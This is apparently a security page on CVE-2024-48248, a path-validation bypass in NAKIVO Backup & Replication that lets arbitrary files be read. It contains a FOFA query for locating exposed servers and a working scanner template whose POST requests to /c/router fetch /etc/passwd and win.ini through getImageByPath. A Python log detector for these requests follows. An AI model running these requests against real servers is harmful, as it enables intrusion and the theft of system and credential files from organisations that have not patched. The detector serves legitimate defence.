Vulnerability Description
NAKIVO Backup & Replication is a backup and disaster recovery solution focused on virtualized, cloud and hybrid environments. An attacker can use the getImageByPath method of the STPreLoadManagement class to bypass path validation and read arbitrary files on the target server (including sensitive configuration files, databases, backup logs, etc.).
fofa:title="NAKIVO Backup"
id: CVE-2024-48248
info:
  name: NAKIVO Backup & Replication任意文件读取漏洞
  author: avic123
  severity: critical
  verified: true
  description: |
    NAKIVO Backup & Replication 是一款专注于虚拟化、云端及混合环境的备份与灾难恢复的解决方案。攻击者可利用STPreLoadManagement 类中的 getImageByPath方法,绕过路径验证并读取目标服务器上的任意文件(包括敏感配置文件、数据库、备份日志等)
    fofa:title="NAKIVO Backup"
  reference:
    - https://mp.weixin.qq.com/s/JVj6_tzyh1f1VdIlPc6Tpg
  created: 2025/02/27
set:
  hostname: request.url.host
rules:
  r0:
    request:
      method: POST
      path: /c/router
      headers:
        Content-Type: application/json
      body: |
        {"action": "STPreLoadManagement", "data": ["C:/windows/win.ini"], "method": "getImageByPath", "sid": "", "tid": "watchTowr", "type": "watchTowr"}
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"action":"STPreLoadManagement"') &&
      !response.body.bcontains(b'"data":null') &&
      response.body.bcontains(b'"data":[')
  r1:
    request:
      method: POST
      path: /c/router
      headers:
        Content-Type: application/json
      body: |
        {"action": "STPreLoadManagement", "data": ["/etc/passwd"], "method": "getImageByPath", "sid": "", "tid": "watchTowr", "type": "watchTowr"}
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"action":"STPreLoadManagement"') &&
      !response.body.bcontains(b'"data":null') &&
      response.body.bcontains(b'"data":[')
expression: r0() || r1()
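For defenders, the request shape in the PoC above (a POST to /c/router whose JSON body calls getImageByPath on STPreLoadManagement with an absolute, traversal or drive-letter path) is what to hunt for in proxy or WAF logs. The detector below is an added example, not part of the original PoC or NAKIVO's code; the log format, client addresses and sample lines are constructed, and the function names are hypothetical.

```python
import json
import posixpath
import re
from typing import List, Optional

# Request markers taken from the PoC on this page.
SUSPECT_ACTION = "STPreLoadManagement"
SUSPECT_METHOD = "getImageByPath"

# Constructed log format (assumption): "<client> <http_method> <path> <json_body>"
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\{.*\})$")
DRIVE_RE = re.compile(r"^[A-Za-z]:/")

def is_hostile_path(p: str) -> bool:
    """True for absolute paths, '..' traversal or Windows drive-letter paths."""
    norm = posixpath.normpath(p.replace("\\", "/"))
    return norm.startswith("/") or ".." in norm.split("/") or bool(DRIVE_RE.match(norm))

def classify(line: str) -> Optional[str]:
    """Return an alert string if the line is a getImageByPath call on
    STPreLoadManagement carrying a hostile path, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, http_method, path, raw = m.groups()
    if http_method != "POST" or path != "/c/router":
        return None
    try:
        body = json.loads(raw)
    except json.JSONDecodeError:
        return None
    if body.get("action") != SUSPECT_ACTION or body.get("method") != SUSPECT_METHOD:
        return None
    data = body.get("data")
    bad = [d for d in data if isinstance(d, str) and is_hostile_path(d)] if isinstance(data, list) else []
    return f"{client}: {SUSPECT_METHOD} with hostile path(s) {bad}" if bad else None

def scan(lines: List[str]) -> List[str]:
    """Run classify() over a log and return only the alerts."""
    return [a for a in map(classify, lines) if a]

# Constructed sample lines: two mirror the PoC bodies, the third is a benign relative path.
SAMPLE_LOG = [
    '10.0.0.5 POST /c/router {"action":"STPreLoadManagement","data":["/etc/passwd"],"method":"getImageByPath","sid":"","tid":"t","type":"t"}',
    '10.0.0.5 POST /c/router {"action":"STPreLoadManagement","data":["C:/windows/win.ini"],"method":"getImageByPath","sid":"","tid":"t","type":"t"}',
    '10.0.0.9 POST /c/router {"action":"STPreLoadManagement","data":["logo.png"],"method":"getImageByPath","sid":"","tid":"t","type":"t"}',
]
```

Running scan(SAMPLE_LOG) yields two alerts for 10.0.0.5 and none for the benign request; feed it real request bodies and it tells you whether this endpoint was probed before the patch was applied.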